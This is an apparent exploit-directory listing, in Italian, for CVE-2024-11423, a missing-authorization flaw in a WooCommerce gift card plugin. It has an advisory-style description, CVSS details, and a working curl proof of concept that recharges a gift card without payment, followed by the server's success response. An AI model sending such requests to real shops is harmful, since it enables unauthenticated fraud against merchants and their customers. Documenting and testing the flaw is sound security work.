Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-11423 — Ultimate Gift Cards for WooCommerce <= 3.0.6 - Autorizzazione mancante che consente il glitch del denaro infinito | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/cve-2024-11423
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebTest di Sicurezza delle APIPenetration Testing
GitHubrandomrobbiebf/cve-2024-11423

CVE-2024-11423

Ultimate Gift Cards for WooCommerce <= 3.0.6 - Autorizzazione mancante che consente il glitch del denaro infinito

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-11423

Ultimate Gift Cards per WooCommerce <= 3.0.6 - Autorizzazione mancante al glitch di denaro infinito

Descrizione

Il plugin Ultimate Gift Cards for WooCommerce – Create WooCommerce Gift Cards, Gift Vouchers, Redeem & Manage Digital Gift Coupons. Offer Gift Certificates, Schedule Gift Cards, and Use Advance Coupons With Personalized Templates per WordPress è vulnerabile alla modifica non autorizzata dei dati a causa di un controllo delle capacità mancante su diversi endpoint dell'API REST come /wp-json/gifting/recharge-giftcard in tutte le versioni fino alla 3.0.6 inclusa. Ciò consente ad attaccanti non autenticati di ricaricare il saldo di una gift card, senza effettuare un pagamento, e di ridurre i saldi delle gift card senza acquistare nulla.

Dettagli

  • Tipo: plugin
  • Slug: woo-gift-cards-lite
  • Versione interessata: 3.0.6
  • Punteggio CVSS: 7.5
  • Gravità CVSS: Alta
  • Vettore CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
  • CVE: CVE-2024-11423
  • Stato: Attivo

POC

root@kitploit:~
curl -X POST \
  https://wp-dev.ddev.site/wp-json/gifting/recharge-giftcard \
  -H 'Content-Type: application/json' \
  -d '{"coupon_code": "CUQP4C9M", "recharge_amount": "100.00", "coupon_expiry": "2027-12-31", "usage_limit": "511"}'


{"code":"success","message":"Coupon is successfully Recharged","data":{"status":200,"remaining_amount":120,"discount_type":"fixed_cart","usage_count":0,"usage_limit":"511","description":"","coupon_expiry":"2027-12-31"}}

Scarica lo strumento